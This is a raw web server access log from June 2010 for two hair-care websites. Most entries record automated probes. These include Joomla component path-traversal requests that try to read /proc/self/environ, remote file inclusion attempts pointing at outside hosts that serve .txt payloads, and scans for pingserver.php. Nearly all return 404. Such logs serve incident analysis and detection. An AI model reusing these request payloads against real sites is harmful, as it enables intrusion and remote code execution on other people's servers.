206.123.118.132 - - [21/Jun/2010:02:51:49 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
206.123.118.132 - - [21/Jun/2010:02:51:49 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
206.123.118.132 - - [21/Jun/2010:02:51:49 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
206.123.118.132 - - [21/Jun/2010:02:52:21 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
206.123.118.132 - - [21/Jun/2010:02:52:21 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
206.123.118.132 - - [21/Jun/2010:02:52:21 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
195.191.40.23 - - [21/Jun/2010:02:53:56 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC" "freehairsecrets.com"
195.191.40.23 - - [21/Jun/2010:02:53:56 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC" "freehairsecrets.com"
213.133.114.100 - - [21/Jun/2010:02:54:04 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.133.114.100 - - [21/Jun/2010:02:54:05 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.133.114.100 - - [21/Jun/2010:02:54:05 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
206.123.118.132 - - [21/Jun/2010:02:54:15 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
206.123.118.132 - - [21/Jun/2010:02:54:15 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
206.123.118.132 - - [21/Jun/2010:02:54:15 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
206.123.118.132 - - [21/Jun/2010:02:54:23 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
206.123.118.132 - - [21/Jun/2010:02:54:23 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
206.123.118.132 - - [21/Jun/2010:02:54:23 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
195.190.166.35 - - [21/Jun/2010:02:54:24 -0700] "GET /logs/access.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
195.190.166.35 - - [21/Jun/2010:02:54:24 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
195.190.166.35 - - [21/Jun/2010:02:54:24 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
213.133.114.100 - - [21/Jun/2010:02:57:28 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
213.133.114.100 - - [21/Jun/2010:02:57:29 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
213.133.114.100 - - [21/Jun/2010:02:57:29 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
77.88.25.28 - - [21/Jun/2010:02:57:32 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14716 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
208.92.165.130 - - [21/Jun/2010:03:00:11 -0700] "GET /logs/access.log/*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.92.165.130 - - [21/Jun/2010:03:00:11 -0700] "GET /*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.92.165.130 - - [21/Jun/2010:03:00:11 -0700] "GET /logs/*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.92.165.130 - - [21/Jun/2010:03:00:17 -0700] "GET /logs/*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.92.165.130 - - [21/Jun/2010:03:00:17 -0700] "GET /*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.92.165.130 - - [21/Jun/2010:03:00:17 -0700] "GET /logs/access.log/*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.92.165.130 - - [21/Jun/2010:03:00:39 -0700] "GET /logs/*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.92.165.130 - - [21/Jun/2010:03:00:39 -0700] "GET /*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.92.165.130 - - [21/Jun/2010:03:00:39 -0700] "GET /logs/access.log/*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.92.165.130 - - [21/Jun/2010:03:00:53 -0700] "GET /logs/*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.92.165.130 - - [21/Jun/2010:03:00:53 -0700] "GET /*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.92.165.130 - - [21/Jun/2010:03:00:53 -0700] "GET /logs/access.log/*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [21/Jun/2010:03:05:38 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13269 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
213.133.114.100 - - [21/Jun/2010:03:07:25 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.133.114.100 - - [21/Jun/2010:03:07:25 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.133.114.100 - - [21/Jun/2010:03:07:25 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
208.92.165.130 - - [21/Jun/2010:03:09:24 -0700] "GET /logs/access.log/index2.php?option=com_gcalendar&vieww=gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.92.165.130 - - [21/Jun/2010:03:09:25 -0700] "GET /index2.php?option=com_gcalendar&vieww=gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.92.165.130 - - [21/Jun/2010:03:09:25 -0700] "GET /logs/index2.php?option=com_gcalendar&vieww=gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.92.165.130 - - [21/Jun/2010:03:09:31 -0700] "GET /logs/access.log/index2.php?option=com_gcalendar&vieww=gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.92.165.130 - - [21/Jun/2010:03:09:31 -0700] "GET /index2.php?option=com_gcalendar&vieww=gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.92.165.130 - - [21/Jun/2010:03:09:31 -0700] "GET /logs/index2.php?option=com_gcalendar&vieww=gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.92.165.130 - - [21/Jun/2010:03:10:19 -0700] "GET /index2.php?option=com_gcalendar&vieww=gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.92.165.130 - - [21/Jun/2010:03:10:19 -0700] "GET /logs/access.log/index2.php?option=com_gcalendar&vieww=gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.92.165.130 - - [21/Jun/2010:03:10:19 -0700] "GET /logs/index2.php?option=com_gcalendar&vieww=gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.92.165.130 - - [21/Jun/2010:03:10:28 -0700] "GET /index2.php?option=com_gcalendar&vieww=gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.92.165.130 - - [21/Jun/2010:03:10:28 -0700] "GET /logs/index2.php?option=com_gcalendar&vieww=gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.92.165.130 - - [21/Jun/2010:03:10:28 -0700] "GET /logs/access.log/index2.php?option=com_gcalendar&vieww=gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.133.114.100 - - [21/Jun/2010:03:11:02 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
213.133.114.100 - - [21/Jun/2010:03:11:03 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
213.133.114.100 - - [21/Jun/2010:03:11:03 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
67.228.62.66 - - [21/Jun/2010:03:11:51 -0700] "POST /logs/pingserver.php HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
67.228.62.66 - - [21/Jun/2010:03:11:52 -0700] "POST /pingserver.php HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
67.228.62.66 - - [21/Jun/2010:03:11:52 -0700] "POST /logs/access.log/pingserver.php HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
92.103.254.153 - - [21/Jun/2010:03:12:00 -0700] "GET /logs/access.log/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
92.103.254.153 - - [21/Jun/2010:03:12:00 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
92.103.254.153 - - [21/Jun/2010:03:12:00 -0700] "GET /logs/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.37.19.40 - - [21/Jun/2010:03:12:06 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.37.19.40 - - [21/Jun/2010:03:12:45 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
109.192.132.129 - - [21/Jun/2010:03:13:36 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.freehairsecrets.com"
109.192.132.129 - - [21/Jun/2010:03:13:36 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.freehairsecrets.com"
109.192.132.129 - - [21/Jun/2010:03:13:37 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.freehairsecrets.com"
174.37.19.40 - - [21/Jun/2010:03:13:53 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
183.180.127.14 - - [21/Jun/2010:03:13:58 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
211.53.209.67 - - [21/Jun/2010:03:14:11 -0700] "GET /logs/access.log/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.53.209.67 - - [21/Jun/2010:03:14:11 -0700] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.53.209.67 - - [21/Jun/2010:03:14:12 -0700] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
174.37.19.40 - - [21/Jun/2010:03:14:25 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
211.53.209.67 - - [21/Jun/2010:03:14:29 -0700] "GET /index2.php?option=com_gcalendar&vieww=gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.53.209.67 - - [21/Jun/2010:03:14:33 -0700] "GET /index2.php?option=com_gcalendar&vieww=gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
183.180.127.14 - - [21/Jun/2010:03:15:00 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
183.180.127.14 - - [21/Jun/2010:03:15:08 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
67.228.62.66 - - [21/Jun/2010:03:15:08 -0700] "POST /logs/access.log%20%20/pingserver.php HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
67.228.62.66 - - [21/Jun/2010:03:15:09 -0700] "POST /pingserver.php HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
67.228.62.66 - - [21/Jun/2010:03:15:09 -0700] "POST /logs/pingserver.php HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
77.88.25.28 - - [21/Jun/2010:03:15:35 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13173 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
183.180.127.14 - - [21/Jun/2010:03:15:55 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
174.37.19.40 - - [21/Jun/2010:03:16:24 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
208.80.193.29 - - [21/Jun/2010:03:16:44 -0700] "GET / HTTP/1.0" 200 910 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; SIMBAR={731C04B8-4220-11DC-82A2-001109821E58}; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
174.37.19.40 - - [21/Jun/2010:03:17:12 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.142.61.152 - - [21/Jun/2010:03:17:51 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
67.228.62.66 - - [21/Jun/2010:03:19:08 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
173.160.141.237 - - [21/Jun/2010:03:19:23 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
183.180.127.14 - - [21/Jun/2010:03:20:02 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
77.88.25.28 - - [21/Jun/2010:03:20:21 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13440 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
183.180.127.14 - - [21/Jun/2010:03:20:54 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
188.40.232.234 - - [21/Jun/2010:03:23:43 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
188.40.232.234 - - [21/Jun/2010:03:24:25 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
77.88.25.28 - - [21/Jun/2010:03:25:41 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14075 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
87.106.28.150 - - [21/Jun/2010:03:28:21 -0700] "GET /main.php?sayfa=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.28.150 - - [21/Jun/2010:03:28:21 -0700] "GET /logs/access_091221.log%20%20//main.php?sayfa=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.28.150 - - [21/Jun/2010:03:28:22 -0700] "GET /logs//main.php?sayfa=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.28.150 - - [21/Jun/2010:03:29:17 -0700] "GET /logs/access_100215.log%20%20//main.php?sayfa=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [21/Jun/2010:03:34:31 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15132 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
174.37.19.40 - - [21/Jun/2010:03:35:32 -0700] "GET /logs/access.log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.37.19.40 - - [21/Jun/2010:03:35:32 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.37.19.40 - - [21/Jun/2010:03:35:32 -0700] "GET /logs/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.37.19.40 - - [21/Jun/2010:03:36:15 -0700] "GET /logs/access.log/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.37.19.40 - - [21/Jun/2010:03:36:15 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.37.19.40 - - [21/Jun/2010:03:36:16 -0700] "GET /logs/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
94.136.63.119 - - [21/Jun/2010:03:37:29 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.uzayyolu.com/tiyatro/idfeel.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "growlonghairfast.com"
94.136.63.119 - - [21/Jun/2010:03:37:29 -0700] "GET /logs/access_100201.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.uzayyolu.com/tiyatro/idfeel.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "growlonghairfast.com"
94.136.63.119 - - [21/Jun/2010:03:37:29 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.uzayyolu.com/tiyatro/idfeel.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "growlonghairfast.com"
94.136.63.119 - - [21/Jun/2010:03:37:45 -0700] "GET /logs/access_100201.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.uzayyolu.com/tiyatro/idfeel.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "growlonghairfast.com"
94.136.63.119 - - [21/Jun/2010:03:37:45 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.uzayyolu.com/tiyatro/idfeel.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "growlonghairfast.com"
94.136.63.119 - - [21/Jun/2010:03:37:45 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.uzayyolu.com/tiyatro/idfeel.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "growlonghairfast.com"
94.136.63.119 - - [21/Jun/2010:03:37:56 -0700] "GET /logs/access_100405.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.uzayyolu.com/tiyatro/idfeel.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "growlonghairfast.com"
216.129.119.47 - - [21/Jun/2010:03:38:06 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "growlonghairfast.com"
94.136.63.119 - - [21/Jun/2010:03:38:12 -0700] "GET /logs/access_100405.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.uzayyolu.com/tiyatro/idfeel.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "growlonghairfast.com"
183.180.127.14 - - [21/Jun/2010:03:38:33 -0700] "GET /logs/access.log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
183.180.127.14 - - [21/Jun/2010:03:38:34 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
183.180.127.14 - - [21/Jun/2010:03:38:34 -0700] "GET /logs/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
67.195.37.176 - - [21/Jun/2010:03:39:40 -0700] "GET /tmp/?M=A HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
174.142.61.152 - - [21/Jun/2010:03:39:48 -0700] "GET /logs/access_100426.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.142.61.152 - - [21/Jun/2010:03:39:48 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.142.61.152 - - [21/Jun/2010:03:39:48 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
77.88.25.28 - - [21/Jun/2010:03:41:08 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13379 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
87.106.28.150 - - [21/Jun/2010:03:41:15 -0700] "GET /logs/access_091221.log//main.php?sayfa=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.28.150 - - [21/Jun/2010:03:41:21 -0700] "GET /logs/access_100215.log//main.php?sayfa=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [21/Jun/2010:03:42:56 -0700] "GET /components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.37.19.40 - - [21/Jun/2010:03:43:24 -0700] "GET /logs/access.log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
